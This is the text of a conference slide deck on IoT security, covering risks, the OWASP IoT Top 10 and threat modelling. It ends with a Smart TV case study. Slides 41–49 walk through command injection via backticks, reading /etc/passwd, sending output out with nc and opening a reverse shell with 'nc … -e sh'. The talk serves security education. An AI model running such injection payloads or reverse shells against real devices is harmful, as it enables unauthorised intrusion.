2. #WHOAMI
§ Mission: To promote cybersecurity at large
§ Moonlighting as an Open Web Application Security Project (OWASP) Evangelist
§ Secretary for the Association of Information Security Professional (AiSP)
§ Advisor for the Singapore Honeynet Project
§ OWASP Global Education Committee (GEC) alumni member
§ Co-authored the OWASP Testing Guides v3.0 and v4.0
§ Co-authored the WASC TC v2.0
§ Volunteer Teacher @Hacking Lab (https://www.hacking-lab.com)
§ Judge for the CSA Cybersecurity Awards 2018/2019 and WorldSkills Competition
(Cybersecurity) 2018/2019
3. OVERVIEW
• Motivation
• Challenge with IoT
• Security & Privacy Risks with IoT
• OWASP IoT Top 10
• Threat Modelling IoT
• Attacking the IoT Stack
• Sample Case Study
4. I O T
What is IoT?
“A proposed development of the
Internet in which everyday
objects have network
connectivity, allowing them to
send and receive data.”
5. WHAT IS IOT?
o Belkin Wemo
o Nespresso Prodigio
o Nest
o Phillips Hue
o Garmin Forerunner
o Fitbit
o Whiting Blood Pressure Monitor
o Meat Thermometers
o Weather Stations
o Ring doorbell
o IP Cameras
o Amazon Dash Buttons
o Amazon Echo (Alexa)
o IP Phones
o Pool Pumps
o Door Locks
o Video Game Consoles
o Alarm Systems
6. MOTIVATION
• IoT Security spending is rapidly increasing
• IoT introduces an increased number of security threats
• IoT security happens on 4 different layers
• Increasing automation of IoT security tasks
• Cyberespionage groups and petty criminals are the most common IoT
attackers
7. IOT SECURITY HAPPENS ON 4 DIFFERENT LAYERS
Device, Communications, Cloud & Lifecycle Management
Source: IoT Analytics
8. IOT IS MORE THAN CONSUMER
Hardware hacking “Junk hacking”
“Stunt hacking”
9. IOT BEYOND THE HYPE
Sectorial/Municipal IoT
o Smart cities
o Smart grid
Industrial IoT
o Connected factories
o Agriculture
o Logistics
Medical IoT
o Smart hospitals
o Electronic medical records
11. SECURITY AND PRIVACY RISKS WITH IOT
Heavy startup presence in the field creates security risks
o Devices are often crowdfunded or created by new companies
who dedicate their limited resources to functionality over
security
o Recent Hewlett Packard study found that 100% of the home
security IoT devices they studied had significant security
vulnerabilities
No governing body or industry standards for IoT security
o Devices are vulnerable to external threats (hackers,
ransomware, etc.) and internal mishandling/errors by
legitimate custodians of the data
Even people who have not purchased an IoT device may be
contributing data to it unknowingly
o August Smart Locks
o Amazon Echo
12. DATA PRIVACY RISKS
Business, employee, and client
information could be:
• Destroyed
• Altered
• Stolen and exposed
• Held for ransom
Understand IoT device data
collection policies:
• What information is gathered?
• How long is the data kept?
• What is the data used for
(marketing research, etc.)?
13. THE POWER OF IOT
• Big data provide analytics
• Business process optimizations
• Multiple concurrent access
14. WHY IT LOOKS SO BAD
Breakers have a long history and robust tools
o Automated network attack tools
o Exploits for most segments of IoT stack
o Physical access and hardware hacking
Builders are still searching for
o Secure toolkits
o Proven methodologies
o Successful models
Result:
o Builders cobble together components
o Build very fragile full stack solutions
o No visibility into security or attack surface
o Attackers have a field day
15. IOT SEARCH ENGINES
Tool Link
• Internet of Things Scanner https://iotscanner.bullguard.com/
• Shodan https://www.shodan.io/
• Thingful https://www.thingful.net/
• ZoomEye https://www.zoomeye.org/
16. MISERABLE TRACK RECORD THUS FAR
Luckily most tests are of consumer IoT
http://www8.hp.com/h20195/V2/GetPDF.aspx/4AA5-4759ENW.pdf
Testing industrial, sectorial, and other IoT is much trickier
Most have heterogeneous brownfield deployments
Testers can’t just pop down to NTUC Fairprice to get access to these deployments
SecuringSmartCities.org has done some testing
If history is a guide though things probably are not good
18. OWASP IOT PROJECT
An overall IoT security effort
o Attack surfaces (present)
o Vulnerability lists (working)
o Reference solutions (coming)
Aggregates community resources
Guidance for manufacturers, developers and consumers
IoT specific security principles
IoT framework assessment
19. OWASP IOT TOP 10 (CIRCA 2014)
Category IoT Security Consideration Recommendations
I1: Insecure Web Interface •Ensure that any web interface coding is written
to prevent the use of weak passwords …
When building a web interface consider implementing
lessons learned from web application security. Employ
a framework that utilizes security …
I2: Insufficient
Authentication/Authorization
•Ensure that applications are written to require
strong passwords where authentication is needed
…
Refer to the OWASP Authentication Cheat Sheet
I3: Insecure Network Services •Ensure applications that use network services
don't respond poorly to buffer overflow, fuzzing
…
Try to utilize tested, proven, networking stacks and
interfaces that handle exceptions gracefully...
I4: Lack of Transport Encryption •Ensure all applications are written to make use
of encrypted communication between devices…
Utilize encrypted protocols wherever possible to
protect all data in transit…
I5: Privacy Concerns •Ensure only the minimal amount of personal
information is collected from consumers …
Data can present unintended privacy concerns when
aggregated…
I6: Insecure Cloud Interface •Ensure all cloud interfaces are reviewed for
security vulnerabilities (e.g. API interfaces and
cloud-based web interfaces) …
Cloud security presents unique security considerations,
as well as countermeasures. Be sure to consult your
cloud provider about options for security mechanisms…
I7: Insecure Mobile Interface •Ensure that any mobile application coding is
written to disallows weak passwords …
Mobile interfaces to IoT ecosystems require targeted
security. Consult the OWASP Mobile …
I8: Insufficient Security
Configurability
•Ensure applications are written to include
password security options (e.g. Enabling 20
character passwords or enabling two-factor
authentication)…
Security can be a value proposition. Design should take
into consideration a sliding scale of security
requirements…
I9: Insecure Software/Firmware •Ensure all applications are written to include
update capability and can be updated quickly …
Many IoT deployments are either brownfield and/or
have an extremely long deployment cycle...
I10: Poor Physical Security •Ensure applications are written to utilize a
minimal number of physical external ports (e.g.
USB ports) on the device…
Plan on having IoT edge devices fall into malicious
hands...
20. OWASP IOT TOP 10: 2018
Source: https://www.owasp.org/index.php/OWASP_Internet_of_Things_Project
21. PRINCIPLES OF IOT SECURITY
• Assume a hostile edge
• Test for scale
• Internet of lies
• Exploit autonomy
• Expect isolation
• Protect uniformly
• Encryption is tricky
• System hardening
• Limit what you can
• Lifecycle support
• Data in aggregate is unpredictable
• Plan for the worst
• The long haul
• Attackers target weakness
• Transitive ownership
• N:N Authentication
23. ATTACKERS
XYZ Entertainment has a lot of intellectual property that I can sell on the black
market. I’m going to figure out how to break in via the IoT devices used.
• Target identified first
• ONLY THEN is the attack considered
• More effort spent planning and executing
• Usually targeting larger organisations (may not necessarily be true now)
Opportunistic Attack
I know how to compromise an embedded device with a known vulnerability. I’m going to
scan the Internet to find unpatched devices and see whether I can access some valuable
data and inject malicious code to infect visitors with the weaponized device.
• Exploit and vulnerability identified first
• Target doesn't matter, just needs to be vulnerable to exploit
• Low-hanging fruit
• Smaller organisations usually fall victim (may not necessarily be true now)
Targeted Attack
25. STATE OF IOT SECURITY
What we often see in IoT implementations
• Security maturity about a decade behind
o Weak/default credentials
o Replay attacks
o Lack of or weak encryption
• Often difficult or impossible to patch
• Very large ecosystem
o Many different connectors, standards, platforms, frameworks, etc.
• Security through obscurity
• Many embedded developer assume their code will operate in a trusted
environment
26. ATTACKING IOT DEVICES (IOT STACK)
• Device
• User/Management Interfaces
o Mobile Applications
o Web
o Thick Clients
• Hardware Input and Output
• Hardware sensors
• Local/Global Network
• Wireless (BLE, ZigBee, Wifi ,etc.,.)
• Cloud Services/API’s
40. SO WHERE DOES THAT LEAVE US WITH TM?
Take all the assets
Associate threat types with each asset
Voila! List of things we need to worry about
41. THE VULNERABILITY ON THE SMART TV
• Looking for a way in…
• Try arbitrary command : `sleep 5 `
42. THE FIELDWORK
• The menu froze for a while.
• Thinking that it might have backtick characters that was injected. Maybe
the TV did not expect them and threw an error which prevented it from
loading.
• Typed in “television `sleep 0`” and tried it again. It loaded instantly.
• Decided to measure the time. It turned out that it always took the television
set three times longer than the input number to become responsive, as
shown below:
o sleep(2) - 6 seconds
o sleep(3) - 9 seconds
o sleep(5) - 15 seconds
43. RUNNING THE COMMANDS
• Test cases
Command Explanation Chars Succeeded
`which nc && sleep 2` which is a linux command that returns the path to a
program if it exists.
&& sleep 2 would freeze the menu for 3*2 seconds if
the which function found nc on the TV set.
19 Yes
`which ssh && sleep 2` Wanted to see if ssh was installed. 20 No
`which wget && sleep 2` But it had wget 21 Yes
`cat /etc/passwd && sleep 2` Wanted to see if /etc/passwd was readable. It was,
and it would have been a big surprise if it wasn't
26 Yes
`cat /etc/shadow && sleep 2` This one is interesting. When there are root
privileges the /etc/shadow file is readable. I wanted
to test if I am root but the file wasn’t readable.
26 No
`ls /etc/shadow && sleep 2` This is the explanation why the shadow file couldn’t
be opened. It just didn’t exist.
25 No
44. GETTING SHELL ACCESS
• Plugged the ethernet cable and connected to the laptop
• Ran “ipconfig” to determine the IP of the laptop
45. GETTING SHELL ACCESS
• A reverse shell would be handy because it would bypass any possible firewall
rules blocking incoming connections.
• But before thinking about how to get one in less than 29 characters it is good
to learn a little bit more about the system.
46. GETTING SHELL ACCESS
• It was discovered that there is nc installed on the TV set, so the next action
is to pipe the output of certain commands through nc back to the laptop.
• The first command “id” was executed, which would indicate whether or not
root privileges is defaulted on the Smart TV set.
47. GETTING SHELL ACCESS
• The next thing was to obtain a
directory listing of / with `ls -la /|nc
169.254.56.216 5`
• Still it had no shell to issue proper
commands. All of them were more or
less length restricted and not too
useful.
48. GETTING SHELL ACCESS
• Since the version of nc that was installed on the TV allowed the -e flag it
was easy to get a reverse shell with: `nc 169.254.213.210 5 -e sh`
• Perfect. There is now a proper shell to work with.
• There were multiple possibilities to mess the TV in a visible way.
49. GETTING SHELL ACCESS
• With this possibility, the avenues available are such as changing the logo
that’s being shown during the boot up process, or changing the apps icons.
50. SOME SMART TV VULNERABILITIES
Some recent Smart TV vulnerabilities that were discovered:
• CVE-2018-16595: Stack Buffer Overflow memory corruption vulnerability that
could lead to app crash.
• CVE-2018-16594: Directory Traversal where an attacker can upload an
arbitrary file with a crafted file name (e.g.: ../../) that can then traverse
the whole filesystem.
• CVE-2018-16593: Command Injection vulnerability can run arbitrary
commands on the system, which can result in complete remote code
execution with root privilege.
51. FINAL THOUGHTS
Privacy in realms of big data is a problem
No real technical solution to this one
Regulation is probably coming
A few organisations (ie., FTC) set to release guidelines next year
Consumers may eschew security but business would not
Security can be a differentiator
52. IN CONCLUSION
Source: Singapore Cyber Landscape 2018 Report, page 49
https://www.csa.gov.sg/~/media/csa/documents/publications/csasinga
porecyberlandscape2018.pdf
Ref#19: Boddy, Sara and Shattuck, Justin. “The Hunt for IoT: The
Growth and Evolution of Thingbots Ensures Chaos,” F5 Labs – Threat
Analysis Report, 13 March 2018,
https://www.f5.com/labs/articles/threat-intelligence/the-hunt-for-iot-
the-growth-andevolution-of-thingbots-ensures-chaos
53. THANK YOU
CECIL SU, DIRECTOR OF TECHNOLOGY RISK ADVISORY
CYBERSECURITY & DIGITAL FORENSICS INCIDENT RESPONSE
BDO ADVISORY (SINGAPORE)
TEL : +65 6828 9118
DID : +65 6829 9628
EMAIL : CECILSU@BDO.COM.SG